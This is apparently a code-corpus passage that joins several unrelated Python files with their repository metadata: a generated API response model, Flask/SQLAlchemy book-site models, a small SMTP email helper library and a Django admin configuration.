swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'continuation_token': 'str',
'total_item_count': 'int',
'items': 'list[NetworkInterfaceTrace]'
}
attribute_map = {
'continuation_token': 'continuation_token',
'total_item_count': 'total_item_count',
'items': 'items'
}
required_args = {
}
def __init__(
self,
continuation_token=None, # type: str
total_item_count=None, # type: int
items=None, # type: List[models.NetworkInterfaceTrace]
):
"""
Keyword args:
continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the `continuation_token` to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The `continuation_token` is generated if the `limit` is less than the remaining number of items, and the default sort is used (no sort is specified).
total_item_count (int): Total number of items after applying `filter` params.
items (list[NetworkInterfaceTrace]): A list of network trace run result.
"""
if continuation_token is not None:
self.continuation_token = continuation_token
if total_item_count is not None:
self.total_item_count = total_item_count
if items is not None:
self.items = items
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `NetworkInterfaceTraceGetResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
return None
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(NetworkInterfaceTraceGetResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NetworkInterfaceTraceGetResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"tlewis@purestorage.com"
] | tlewis@purestorage.com |
e4a7172c8a987feebc4e08c448cc4dc8bfc40b73 | 913334a96677deb9a199d4a7244a4fa56e989fa7 | /5flask_demo/modles.py | b90abf5bc7e9a32e86e2ee62ce28a818258daaff | [] | no_license | KangZhengweiGH/flask_demos | 7bd4b64f252055017f512f6fb348c885c377f241 | 1a0c621c8f0bd44fd583b026ef575990b5dda706 | refs/heads/master | 2020-05-16T07:28:24.055118 | 2019-05-08T01:00:30 | 2019-05-08T01:00:30 | 182,879,507 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,154 | py | # coding=utf-8
from extend import db
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(12), nullable=True, unique=True)
telnumber = db.Column(db.Integer, nullable=False, unique=True)
password = db.Column(db.String(100), nullable=False)
vip = db.Column(db.BOOLEAN, default=False)
isdelate = db.Column(db.BOOLEAN, default=False)
logintime = db.Column(db.DateTime, nullable=True)
category_book = db.Table('category_book',
db.Column('category_id', db.Integer, db.ForeignKey('category.id'), primary_key=True),
db.Column('book_id', db.Integer, db.ForeignKey('book.id'), primary_key=True))
category_chapter = db.Table('category_chapter',
db.Column('category_id', db.Integer, db.ForeignKey('category.id'), primary_key=True),
db.Column('chapter_id', db.Integer, db.ForeignKey('chapter.id'), primary_key=True))
class Category(db.Model):
__tablename__ = 'category'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(50), nullable=False)
fatherc_id = db.Column(db.Integer, db.ForeignKey('fatherc.id'))
fatherc = db.relationship('Fatherc', backref=db.backref('categorys'))
class Fatherc(db.Model):
__tablename__ = 'fatherc'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(50), nullable=False)
class Book(db.Model):
__tablename__ = 'book'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(50), nullable=False)
need_vip = db.Column(db.BOOLEAN, default=False)
introduce = db.Column(db.Text, nullable=True)
book_image = db.Column(db.String(50), nullable=True)
isdelate = db.Column(db.BOOLEAN, default=False)
# 这个外键就不需要了,呀好坑
# category_id = db.Column(db.Integer, db.ForeignKey('category.id'))
category = db.relationship('Category', secondary=category_book, backref=db.backref('books'))
class Chapter(db.Model):
__tablename__ = 'chapter'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(50), nullable=False)
need_vip = db.Column(db.BOOLEAN, default=False)
book_id = db.Column(db.Integer, db.ForeignKey('book.id'))
book = db.relationship('Book', backref=db.backref('chapters'))
category = db.relationship('Category', secondary=category_chapter, backref=db.backref('chapters'))
# class Artical(db.Model):
# __tablename__ = 'articals'
# id = db.Column(db.Integer, primary_key=True, autoincrement=True)
# name = db.Column(db.String(50), nullable=False)
# content = db.Column(db.text, nullable=False)
#
#
# class Comment(db.Model):
# __tablename__ = 'comments'
# id = db.Column(db.Integer, primary_key=True, autoincrement=True)
# name = db.Column(db.String(50), nullable=False)
# content = db.Column(db.text, nullable=False)
| [
"email@1101186901.com"
] | email@1101186901.com |
3263908d9d30879e4febda3d96c3f7a74b399214 | 9a21850ff752b6bd148a9dfbadd210419c2d4a6e | /posts/posts.py | 39bb7bcbfa0e3cbcd84aaeef44c77b06619a2603 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause"
] | permissive | importcjj/Posts | 7d3a9a04f829e92027c310f0daf8be259d4a91a9 | fc2abe1c48fa09af820a25c4cc00520253a6b7f1 | refs/heads/master | 2021-01-10T09:43:07.401682 | 2016-04-20T05:24:36 | 2016-04-20T05:24:36 | 49,366,691 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,705 | py | # -*- coding: utf-8 -*-
import smtplib
import socket
from contextlib import contextmanager
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
class PostSMTP(smtplib.SMTP):
def __init__(self, sender, alias=None, host='', port=0,
local_hostname=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
smtplib.SMTP.__init__(self, host, port, local_hostname, timeout)
self._sender = sender
self._sender_alias = alias if alias else sender.split('@')[0]
self._attachments = {}
self._mails = []
def attach(self, attachments):
"""Add attachments.
Args:
attachments (dict): attachments
example: {'alias_name': 'path/to/filename'}
Returns:
obj to support chain calling.
"""
try:
iteritems = attachments.iteritems()
except AttributeError:
iteritems = attachments.items()
for k, v in iteritems:
self._attachments[k] = v
return self
def _header(self, msg, recipient, subject):
msg['Subject'] = subject
msg['From'] = '{} <{}>'.format(self._sender_alias, self._sender)
msg['To'] = ', '.\
join(recipient) if isinstance(recipient, list) else recipient
return msg
def _mount(self, mail, files):
for _ in files:
mail['msg'].attach(_)
return mail
def _load_files(self):
files = []
try:
iteritems = self._attachments.iteritems()
except AttributeError:
iteritems = self._attachments.items()
for k, v in iteritems:
with open(v, 'rb') as f:
part = MIMEApplication(f.read())
part.add_header('Content-Disposition', 'attachment', filename=k)
part.add_header('Content-ID', '<{}>'.format(k))
files.append(part)
return files
def text(self, recipient, subject, content, charset='us-ascii'):
_text = MIMEText(content, _subtype='plain', _charset=charset)
_msg = MIMEMultipart()
_msg = self._header(_msg, recipient, subject)
_msg.attach(_text)
self._mails.append({
'recipient': recipient,
'msg': _msg
})
return self
def html(self, recipient, subject, content, charset='utf-8'):
_html = MIMEText(content, _subtype='html', _charset=charset)
_msg = MIMEMultipart()
_msg = self._header(_msg, recipient, subject)
_msg.attach(_html)
self._mails.append({
'recipient': recipient,
'msg': _msg
})
return self
def _send(self):
files = self._load_files()
for mail in self._mails:
self._mount(mail, files)
self.sendmail(
self._sender,
mail['recipient'],
mail['msg'].as_string())
class Posts(object):
def __init__(self, host, usermame, password, port=25):
self._host = host
self._port = port
self._username = usermame
self._password = password
@contextmanager
def __call__(self, sender=None, alias=None, ssl=False):
sender = sender if sender else self._username
self._smtp = PostSMTP(sender, alias)
self._smtp.connect(self._host)
if ssl:
self._smtp.ehlo()
self._smtp.starttls()
self._smtp.ehlo()
self._smtp.login(self._username, self._password)
try:
yield self._smtp
self._smtp._send()
finally:
self._smtp.quit()
| [
"importcjj@gmail.com"
] | importcjj@gmail.com |
f8829530e57c7661aff17909cf2af499c0580ec3 | 40f82a8341c7912540644fe5b51dc6e455ea8cb2 | /shares/admin.py | 6a9f67d06537c324008251fffef486777ce9b521 | [] | no_license | persionalWeb/persionalWeb | 3765a3329ba34b4866774dc8167613e4a452043f | e80b1b92a1c55369d1f121d609b90f7edf47d588 | refs/heads/master | 2022-07-07T02:54:19.517215 | 2020-05-17T04:07:02 | 2020-05-17T04:07:02 | 258,783,764 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 605 | py | from django.contrib import admin
from .models import Klins,Stocks
class KlinsAdmin(admin.ModelAdmin):
list_display = ['id','fid', 'code', 'name', 'short_data', 'flag', 'addtime']
search_fields = ['name']
list_filter = ['flag']
list_per_page = 10
ordering = ['id']
class StocksAdmin(admin.ModelAdmin):
list_display = ['id','fid', 'code', 'name', 'industry', 'area', 'price_change', 'pricediff', 'totals', 'short_data', 'addtime']
search_fields = ['name']
list_per_page = 10
ordering = ['id']
admin.site.register(Klins,KlinsAdmin)
admin.site.register(Stocks,StocksAdmin) | [
"63894777+niexingang123@users.noreply.github.com"
] | 63894777+niexingang123@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.